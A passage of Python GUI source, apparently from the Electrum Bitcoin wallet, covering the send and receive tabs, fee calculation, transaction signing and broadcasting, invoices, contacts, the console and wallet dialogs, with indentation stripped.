if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 2 if self.fee_unit else 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
displayed_feerate = displayed_feerate // 1000 if displayed_feerate else 0
displayed_fee = displayed_feerate * size
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
if feerounding:
self.feerounding_icon.setToolTip(
_('additional {} satoshis will be added').format(feerounding))
self.feerounding_icon.setVisible(True)
else:
self.feerounding_icon.setVisible(False)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
